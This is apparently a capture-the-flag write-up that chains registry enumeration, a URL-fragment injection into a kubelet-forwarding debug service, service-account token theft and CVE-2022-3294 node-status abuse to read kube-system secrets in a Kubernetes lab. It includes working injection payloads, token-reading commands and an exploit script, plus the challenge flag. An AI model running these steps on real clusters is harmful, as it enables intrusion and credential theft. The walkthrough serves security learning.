Game of Pods

Challenge Description

A Kubernetes-based security challenge that requires exploiting container registry access, service account permissions, and a URL injection vulnerability to achieve privilege escalation from a limited pod environment to cluster-level access.

Solution Overview

This challenge demonstrates a multi-stage Kubernetes security exploitation chain involving container registry enumeration, URL injection, and RBAC privilege escalation:

  1. Container Registry Discovery - Enumerate Azure Container Registry (ACR) repositories using the ORAS CLI tool to discover the k8s-debug-bridge service

  2. Image Analysis - Extract and analyze container images to discover source code revealing a URL injection vulnerability in the debug bridge service

  3. URL Injection - Exploit URL parsing vulnerability to inject commands through the kubelet API and extract service account tokens

  4. Service Account Token Theft - Abuse create secrets permission to generate a service account token for the privileged k8s-debug-bridge service account

  5. Node Proxy Exploitation (CVE-2022-3294) - Leverage node status modification and proxy capabilities to redirect API requests and access kube-system secrets

Key Vulnerability: URL injection in the k8s-debug-bridge service combined with RBAC misconfigurations allowed escalation from limited pod access to cluster-admin level privileges through CVE-2022-3294.

Initial Analysis

Kubernetes Permission Enumeration

Since the challenge mentioned Kubernetes, we started by checking what permissions we have:

Permissions were limited. Only one pod existed:

Let's inspect the pod configuration in detail:
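A sketch of the enumeration commands, run from inside the compromised pod (kubectl falls back to the in-cluster service-account config; the staging namespace is confirmed by the findings below):

```shell
POD_NS=staging                                              # the pod's own namespace
timeout 15 kubectl auth can-i --list -n "$POD_NS" || true   # RBAC permissions of the mounted service account
timeout 15 kubectl get pods -n "$POD_NS" || true            # only one pod exists
timeout 15 kubectl get pods -n "$POD_NS" -o yaml || true    # full spec: image, serviceAccountName, namespace
```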

Output:

Key findings:

  • Pod is using service account: test-sa

  • Pod is running the image: hustlehub.azurecr.io/test:latest

  • Pod is deployed in the staging namespace

  • We are likely executing inside this pod

Security Note: The pod is pulled from Azure Container Registry (ACR), which may contain additional repositories accessible with the same credentials.

Container Registry Discovery

Let's check for any built-in tools to interact with the container registry:

The oras binary stood out - its timestamp differed from the base image, suggesting it was intentionally added for this challenge.

Dumping Container Images

A quick search revealed that ORAS is the OCI Registry As Storage project.

Step 1: List available repositories
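With ORAS present, listing the registry's repositories is a single command (a sketch; failures outside the challenge environment are tolerated):

```shell
REGISTRY=hustlehub.azurecr.io
timeout 15 oras repo ls "$REGISTRY" || true   # enumerate repositories in the ACR
```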

Output:

We discovered two repositories:

  • test - Likely the container we're currently running in

  • k8s-debug-bridge - An interesting service that might contain valuable information

Step 2: Attempt to pull the test image
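A sketch of the naive pull attempt:

```shell
mkdir -p /tmp/test-image
timeout 15 oras pull hustlehub.azurecr.io/test:latest -o /tmp/test-image || true
ls -a /tmp/test-image   # comes back empty, for the reasons explained below
```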

Analysis:

The pull operation returned an empty folder. This failed because:

  • test:latest is a container image, not a file-based OCI artifact

  • ORAS only writes layers to disk if they have filenames (org.opencontainers.image.title)

  • Container image layers are filesystem tarballs, not named files

  • ORAS skipped extracting them, leaving the directory empty

The error message suggested using oras copy instead.

Step 3: Copy the image using OCI layout
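A sketch of the copy into a local OCI image layout (the destination path is arbitrary):

```shell
SRC=hustlehub.azurecr.io/test:latest
timeout 60 oras copy "$SRC" --to-oci-layout /tmp/test-layout:latest || true
ls /tmp/test-layout 2>/dev/null || true   # an OCI layout contains index.json, oci-layout, blobs/
```

The same command with `k8s-debug-bridge:latest` as the source retrieves the other repository.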

Success! We retrieved the image layers and corresponding metadata:

Step 4: Analyze the test image configuration

Examining the image configuration file reveals the build history and installed tools. The configuration confirms this is the image our current pod is running, and the presence of kubectl, oras, and coredns-enum indicates it is the tooling container we are currently operating from.
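The build history can be read straight out of the OCI layout by following the digests from index.json to the manifest to the config blob. A sketch (python3 stands in for jq here; the layout path matches the oras copy destination used earlier):

```shell
# Print the Dockerfile build steps recorded in an OCI image layout.
oci_history() {
  python3 - "$1" <<'PY'
import json, os, sys
layout = sys.argv[1]
blob = lambda d: os.path.join(layout, "blobs", *d.split(":"))   # "sha256:x" -> blobs/sha256/x
index = json.load(open(os.path.join(layout, "index.json")))
manifest = json.load(open(blob(index["manifests"][0]["digest"])))
config = json.load(open(blob(manifest["config"]["digest"])))
for h in config.get("history", []):
    print(h.get("created_by", ""))
PY
}
# oci_history /tmp/test-layout   # run inside the pod after the oras copy
```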

Step 5: Extract the k8s-debug-bridge image

Now let's examine the more interesting k8s-debug-bridge repository:

Step 6: Analyze the k8s-debug-bridge configuration

Examining the image configuration reveals how the container was built. Key observations:

  • The Dockerfile copies both k8s-debug-bridge (binary) and k8s-debug-bridge.go (source code)

  • The service exposes port 8080

  • The CMD runs the compiled binary ./k8s-debug-bridge

Step 7: Extract the source code

The container includes the source code! Let's extract the last layer:
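Since the source files were COPY'd last, they sit in the top (last) layer of the image. A sketch that resolves the last layer's blob path from the manifest and extracts it (layout path is an assumption matching the earlier oras copy):

```shell
# Print the on-disk path of an OCI layout's last (top) filesystem layer.
last_layer() {
  python3 - "$1" <<'PY'
import json, os, sys
layout = sys.argv[1]
blob = lambda d: os.path.join(layout, "blobs", *d.split(":"))
index = json.load(open(os.path.join(layout, "index.json")))
manifest = json.load(open(blob(index["manifests"][0]["digest"])))
print(blob(manifest["layers"][-1]["digest"]))
PY
}
# mkdir -p /tmp/bridge-src && tar -xzf "$(last_layer /tmp/bridge-layout)" -C /tmp/bridge-src
# ls /tmp/bridge-src   # k8s-debug-bridge, k8s-debug-bridge.go
```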

Success! We extracted both the compiled Go binary and the source code:

Security Note: Including source code in production container images is a significant security risk, as it makes vulnerability analysis much easier for attackers.


Main Exploitation

Debug Bridge Source Code Analysis

The k8s-debug-bridge is a debug proxy service for Kubernetes that forwards requests for logs or checkpoints from clients to the kubelet API running on cluster nodes.

Exposed Endpoints:

Endpoint 1: /logs

Purpose: Retrieves container logs from the Kubernetes kubelet API.

How it works:

  1. Accepts POST request with JSON: {"node_ip": "X.X.X.X", "pod": "name", "namespace": "ns", "container": "name"}

  2. Constructs URL: https://<node_ip>:10250/containerLogs/<namespace>/<pod>/<container>

  3. Makes GET request to kubelet with service account token

  4. Returns log data as application/octet-stream

Endpoint 2: /checkpoint

Purpose: Creates a checkpoint (snapshot) of a running container.

How it works:

  1. Accepts POST request with same JSON parameters as /logs

  2. Constructs URL: https://<node_ip>:10250/checkpoint/<namespace>/<pod>/<container>

  3. Makes POST request to kubelet

  4. Returns checkpoint data/response

Finding the k8s-debug-bridge Service

The k8s-debug-bridge service must be deployed somewhere in the cluster. Let's scan the internal subnet to locate it.

Method 1: Using nmap
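A sketch of the scan (10.43.0.0/16 is k3s's default service CIDR; narrowing to a /24 here is an assumption consistent with the service IPs discovered below):

```shell
SUBNET=10.43.0.0/24
timeout 60 nmap -Pn --open -p 80,8080 "$SUBNET" || true   # service IPs don't answer ping, hence -Pn
```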

Method 2: Using coredns-enum (Alternative)

Since we have coredns-enum installed (a tool that enumerates Kubernetes services over DNS, listing service IPs, ports, and endpoints), we can use it to discover services:

Discovered Services:

Name               IP            Port
app-blog-service   10.43.1.36    80
k8s-debug-bridge   10.43.1.168   80

URL Injection Vulnerability

Step 1: Test the debug bridge functionality

Let's interact with the k8s-debug-bridge to retrieve logs from app-blog-service:
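A sketch of a legitimate request to the bridge (the service IP comes from the enumeration above; the node IP and pod names are the ones used throughout this writeup):

```shell
BRIDGE=http://10.43.1.168
payload='{"node_ip":"172.30.0.2","pod":"app-blog","namespace":"app","container":"app-blog"}'
curl -s --max-time 5 -X POST "$BRIDGE/logs" \
  -H 'Content-Type: application/json' -d "$payload" || true   # returns the container's logs
```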

The service works as expected and returns container logs, but there's nothing immediately useful.

Step 2: Analyze URL construction logic

Let's examine how the service constructs URLs:

This immediately caught my attention because req.NodeIP is user-controlled input being inserted directly into a URL string via simple string concatenation. The code then validates the constructed URL rather than validating the input components first.

Step 3: Understanding the Security Controls

Before attempting to exploit this, I mapped out the validation logic:

Key insight: All validation happens on the parsed URL, not on the raw input parameters. Since node_ip is the first parameter in the fmt.Sprintf, the validation only checks that parsedURL.Hostname() returns a valid IP, but it doesn't validate that node_ip contains only an IP.

Step 4: Exploiting URL fragments for command injection

URL fragments (everything after #) are:

  • Part of the URL string during parsing

  • Never sent to the server in HTTP requests

If we inject a # into node_ip, everything after it becomes a fragment and gets discarded by the HTTP client.

The kubelet API has a /run endpoint for command execution. Let's construct a POST request to /run to perform command execution:
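A sketch of the injected request: node_ip smuggles in a new path and query string, and the trailing # turns the remainder of the URL template into a fragment:

```shell
BRIDGE=http://10.43.1.168
evil='172.30.0.2:10250/run/app/app-blog/app-blog?cmd=id#'
payload=$(printf '{"node_ip":"%s","pod":"app-blog","namespace":"app","container":"app-blog"}' "$evil")
curl -s --max-time 5 -X POST "$BRIDGE/logs" \
  -H 'Content-Type: application/json' -d "$payload" || true
```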

The constructed URL will be: https://172.30.0.2:10250/run/app/app-blog/app-blog?cmd=id#:10250/containerLogs/app/app-blog/app-blog

Parsed components:

  • Host: 172.30.0.2:10250

  • Path: /run/app/app-blog/app-blog

  • Query: cmd=id

  • Fragment: :10250/containerLogs/app/app-blog/app-blog (discarded by the HTTP client)

Success! We achieved command execution.

Finding app-blog source code

Performing some enumeration, we found the file main.go.

From the source code, we can infer that the app-blog web application has permission to create secrets within the app namespace.

Service Account Token Extraction

Let's extract the service account token from the app-blog container:
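Reusing the injection, we swap cmd=id for a read of the default service-account token mount (a sketch; the space must be URL-encoded so the query string survives parsing):

```shell
BRIDGE=http://10.43.1.168
cmd='cat%20/var/run/secrets/kubernetes.io/serviceaccount/token'
evil="172.30.0.2:10250/run/app/app-blog/app-blog?cmd=${cmd}#"
payload=$(printf '{"node_ip":"%s","pod":"app-blog","namespace":"app","container":"app-blog"}' "$evil")
curl -s --max-time 5 -X POST "$BRIDGE/logs" \
  -H 'Content-Type: application/json' -d "$payload" || true
```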

Extracted token:

Decoded token payload:
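The payload can be decoded offline: a JWT's second dot-separated segment is base64url with padding stripped. A small sketch (the actual token value is redacted above):

```shell
# Decode the payload (claims) segment of a JWT.
jwt_payload() {
  seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')          # base64url -> base64
  while [ $(( ${#seg} % 4 )) -ne 0 ]; do seg="${seg}="; done    # restore padding
  printf '%s' "$seg" | base64 -d
}
# jwt_payload "$TOKEN"   # sub should read system:serviceaccount:app:app
```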

This token belongs to the app service account in the app namespace.

Privilege Escalation via Secret Creation

Step 1: Enumerate service account permissions

The permission check shows no explicit permissions, but let's test secret operations:
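A sketch of the checks with the stolen token (the token value itself is a placeholder here):

```shell
APP_TOKEN=${APP_TOKEN:-'<token extracted from the app-blog pod>'}
timeout 15 kubectl --token="$APP_TOKEN" -n app auth can-i --list || true   # shows nothing explicit...
timeout 15 kubectl --token="$APP_TOKEN" -n app get secrets || true         # ...but this works
```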

Success! We can read secrets. Let's examine them:

Output:

The password hash is Argon2id, which is computationally very expensive to crack, so that's not the intended path.

Step 2: Abuse create secrets permission

From analyzing the app-blog source code earlier, we know the app service account can create secrets. Let's test if we can create a service account token secret for the k8s-debug-bridge service account:

Reference: HackTricks - Creating and Reading Secrets

Create a service account token secret:
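Kubernetes auto-populates secrets of type kubernetes.io/service-account-token with a token for the service account named in the annotation. A sketch (the secret name and namespace are assumptions):

```shell
APP_TOKEN=${APP_TOKEN:-'<app service-account token>'}
timeout 15 kubectl --token="$APP_TOKEN" -n app apply -f - <<'EOF' || true
apiVersion: v1
kind: Secret
metadata:
  name: debug-bridge-token
  annotations:
    kubernetes.io/service-account.name: k8s-debug-bridge
type: kubernetes.io/service-account-token
EOF
```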

Step 3: Extract the k8s-debug-bridge token

The token is automatically populated by Kubernetes! Let's decode it:
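A sketch of reading the populated token out of the secret's data (the secret name is an assumption):

```shell
APP_TOKEN=${APP_TOKEN:-'<app service-account token>'}
timeout 15 kubectl --token="$APP_TOKEN" -n app get secret debug-bridge-token \
  -o jsonpath='{.data.token}' | base64 -d || true
```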

Step 4: Enumerate k8s-debug-bridge permissions
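A sketch of the permission check with the newly minted token:

```shell
DB_TOKEN=${DB_TOKEN:-'<k8s-debug-bridge token from the created secret>'}
timeout 15 kubectl --token="$DB_TOKEN" auth can-i --list || true
```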

Critical permissions identified:

  • nodes/proxy - Can proxy requests through nodes

  • nodes/status - Can patch node status (UPDATE verb)

  • pods - Can list pods in all namespaces

Code Execution via Nodes/Proxy

Since we have access to nodes/proxy, we can execute code via the kubelet API. See the HackTricks article for more information on how to abuse this.

Let's gather more information about the nodes:

It turns out there is a node called noder.

The k8s-debug-bridge service account can interact with the kubelet API on nodes through the Kubernetes API server's proxy endpoint. This is significant because the kubelet API allows direct interaction with the pods running on a node.

Let's try listing the pods running on the noder node.

First, we start a kubectl proxy in the background, then use curl to send requests through the node proxy endpoint.
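A sketch of the workflow (the token and coredns pod name are placeholders; /pods lists the node's pods, while /run would execute a command in one of them):

```shell
DB_TOKEN=${DB_TOKEN:-'<k8s-debug-bridge token>'}
timeout 15 kubectl proxy --port=8001 --token="$DB_TOKEN" >/dev/null 2>&1 &
KPID=$!
sleep 1
# list pods on the node via the kubelet's /pods endpoint
curl -s --max-time 5 "http://127.0.0.1:8001/api/v1/nodes/noder/proxy/pods" || true
# command execution attempt via the kubelet's /run endpoint (POST)
curl -s --max-time 5 -X POST \
  "http://127.0.0.1:8001/api/v1/nodes/noder/proxy/run/kube-system/<coredns-pod>/coredns?cmd=id" || true
kill "$KPID" 2>/dev/null || true
```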

However, we have already dumped the k8s-debug-bridge container earlier, and there isn't anything useful in it.

Exploiting CVE-2022-3294

We would need to perform privilege escalation from our existing service account to get access to kube-system namespace.

Trying to get code execution on the coredns pod returned an error saying that id is not in $PATH. Trying other common binaries returned the same error.

From here I was stuck for quite a while and couldn't progress. I eventually resorted to OSINT on the challenge author and found out that he had reported CVE-2022-3294.

Since we have access to nodes/proxy and can update nodes/status, we can exploit CVE-2022-3294:

The exploit works as follows:

  1. An authenticated user with nodes/proxy and nodes/status permissions can modify node objects

  2. By changing the node's kubelet endpoint in the status, we can redirect proxy requests

  3. When the API server tries to proxy the request through what it thinks is the kubelet, it actually connects to itself (port 6443)

  4. The API server authenticates to itself, creating a confused deputy scenario that bypasses RBAC checks

Step 1: Patch the node status to redirect to API server

Step 2: Access kube-system secrets through the node proxy

Note: You need to run both commands back-to-back, or the node status may be reset by the kubelet. You can run the bash script below to execute them sequentially.
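A sketch of the combined script (the API server's internal IP is a placeholder, and --subresource=status requires kubectl 1.24 or newer):

```shell
#!/bin/bash
# CVE-2022-3294 sketch: point the node's kubelet endpoint at the API server,
# then immediately read kube-system secrets through the node proxy before the
# real kubelet re-reports its status.
DB_TOKEN=${DB_TOKEN:-'<k8s-debug-bridge token>'}
APISERVER_IP=${APISERVER_IP:-'<api-server internal IP>'}

# Step 1: rewrite the node status so the "kubelet" is the API server on 6443
patch=$(printf '{"status":{"addresses":[{"type":"InternalIP","address":"%s"}],"daemonEndpoints":{"kubeletEndpoint":{"Port":6443}}}}' "$APISERVER_IP")
timeout 15 kubectl --token="$DB_TOKEN" patch node noder \
  --subresource=status --type=merge -p "$patch" || true

# Step 2: the API server now proxies the request to itself with its own credentials
timeout 15 kubectl --token="$DB_TOKEN" get --raw \
  "/api/v1/nodes/noder/proxy/api/v1/namespaces/kube-system/secrets" || true
```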


Getting the Flag

Success! We retrieved secrets from the kube-system namespace:

Summary:

  1. URL Injection - The k8s-debug-bridge service concatenated user input into URLs before validation, allowing us to inject URL components via fragments

  2. Kubelet API Access - The URL injection gave us command execution through the kubelet API, allowing service account token extraction

  3. Secret Creation Abuse - The app service account could create secrets, including service account token secrets for other accounts

  4. RBAC Misconfiguration - The k8s-debug-bridge service account had excessive permissions (nodes/proxy + nodes/status)

  5. CVE-2022-3294 - By modifying the node's kubelet endpoint port from 10250 to 6443 (API server port), we redirect node proxy requests to the API server itself. When the API server attempts to proxy our request through the "kubelet," it actually connects and authenticates to itself. This self-authentication creates a confused deputy vulnerability where the API server processes the proxied request with elevated privileges, bypassing RBAC and granting access to cluster-admin level resources.

Flag: WIZ_CTF{k8s_is_one_big_proxy}
